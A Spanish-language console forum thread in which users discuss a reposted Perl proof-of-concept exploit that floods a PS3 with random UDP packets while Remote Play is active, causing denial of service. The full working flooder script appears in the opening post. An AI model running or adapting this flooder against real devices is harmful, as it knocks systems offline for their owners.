posible exploit ps3?

si alguien entiende esto :


####.:Playstation 3 "Remote Play" Remote DoS Exploit:.####
#
# A UDP flood while the "remote play" feature is active
# will result in a denial of service condition.
#
# Tested using PS3 v1.60 (20GB) & PSP v3.10 OE-A
#
# -Dark_K
#
# POC code is based on odix's perl udp flooder
##########################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=1) {
printf "usage: ./ps3rpdos.pl \n";
exit(1);
}

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ARGV[0]");

printf "Sending...\n";

for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}



lo he sacado de este enlace http://www.securityfocus.com/archive/1/463847




sino se puede poner esto lo cerrais y pido disculpas




si alguien sabe lo que significa que lo traduzca para el resto de los mortales




gracias
por lo k he entendido, parece ser un exploit mediante la conexion de control remoto entre la ps3 y psp... pero aun no lo sé con certeza, mi ingles es muyyyyyyy malo [buaaj] [+risas] [+risas]
Pues si es un "exploit" lo que hace es una "inundacion" del protocolo UDP cuando esta encendido en la consola lo de controlarla remotamente con la PSP. Al hacer esta sobrecarga la consola entra en modo de "denegacion de servicio" (DoS). Ahora habra que esperar a ver si una vez hecho esto se puede aprovechar esa situacion para algo, de mometno no se puede arrancar nada.
y los que tiene la version de 20 GB esto serviria ?????
Si te fijas esta probada en una PS3 de 20GB:

Tested using PS3 v1.60 (20GB) & PSP v3.10 OE-A

De todas formas ya te digo que no sirve para nada de momento.
Bueno poco a poco al menos vamos viendo q la gente va trabajando en el tema, q no es poco.
A ver si se confirma y se puede aprovechar.
Salu2.
algo es algo , se mueve la scene...
Bueno, yo creo que esto ira como en todo mas o menos como la scene de la psp. No creo que nadie saque un isoloader asi por las buenas al menos ejecutandose desde el firmware de la ps3(desconzco si a traves de linux se podria hacer algo).

Si hay un fallo en el firmware lo primero seria el tipico Hello World y ya ir trabajando, empezaran a salir emuladores y programas varios y ya ira surgiendo la cosa.

Eso de sin saber si hay alguna vulnerabilidad o si la hay que se pueda acceder a todo el kernel de la consola y ejecutar backups asi por las buenas no termina de convencerme.
rekon
pienso lo mismo , creo que todo es cuestion de tiempo, y mientras tanto a disfrutar nuestra flamante ps3
Este exploit NO se puede utilizar para cargar codigo en la ps3, lo unico que hace es un ataque DoS a la Ps3 y la bloquea.

Saludos!
¿Pero habeis leido el código? Me sorprende que un lenguaje tan pobre como Perl (en lo que está hecho) tenga suficiente potencia para producir una denegación de servicio, generalmente un script perl cuando se usa de forma intensiva torra a la máquina que lo ejecuta jajaja (y lo digo con conocimiento de causa, que sufro spamassassin en silencio xD). Si no entiendo mal el código, lo que hace es enviar paquetes UDPs al monton. Eso, en el mejor de los casos, va a conseguir dejar torrada la consola pero poco mas :)
SKyo escribió:¿Pero habeis leido el código? Me sorprende que un lenguaje tan pobre como Perl (en lo que está hecho) tenga suficiente potencia para producir una denegación de servicio. Si no entiendo mal el código, lo que hace es enviar paquetes UDPs al monton. Eso, en el mejor de los casos, va a conseguir dejar torrada la consola pero poco mas :)

Supongo que para enviar un flood de paquetes lo puedes hacer hasta con el Basic de Microsoft [jaja]
RuLaX escribió:Supongo que para enviar un flood de paquetes lo puedes hacer hasta con el Basic de Microsoft [jaja]



jajaja, pues si. Si miras el codigo, es super simple, hace un random de puertos UDP y empieza a enviarle basura por un tubo. Este script traducido a C seguro que hace mucha mas pupita a la PS3 pero lo único que conseguiremos es una magnifica consola torrada atendiento peticiones sin sentido xD
Hmbre... pero para llegar a grandes logros hay que comenzar por descubrimientos pequeñitos :D
No se ke idea tendreis del lenguaje Perl (yo de programar ni zorra) pero se de sobras ke es uno de los lenguajes de programacion mas pepinos ke hay, tiempo al tiempo ke aun faltan muchissimas cosas por ver.

Salu2
fidillo escribió:No se ke idea tendreis del lenguaje Perl (yo de programar ni zorra) pero se de sobras ke es uno de los lenguajes de programacion mas pepinos ke hay, tiempo al tiempo ke aun faltan muchissimas cosas por ver.
Salu2


Defina 'pepino' por favor jajaja. Perl es un lenguaje cuya mayor virtud es la de majenar las cadenas con relativa facilidad (ofrece muchas posibilidades de transformación/procesado) pero como todo lenguaje interpretado es lento (este lo es especialmente). Este DoS para PS3 me resulta mas curioso que otra cosa, pero no creo que la scene avance mucho con esto :)
16 respuestas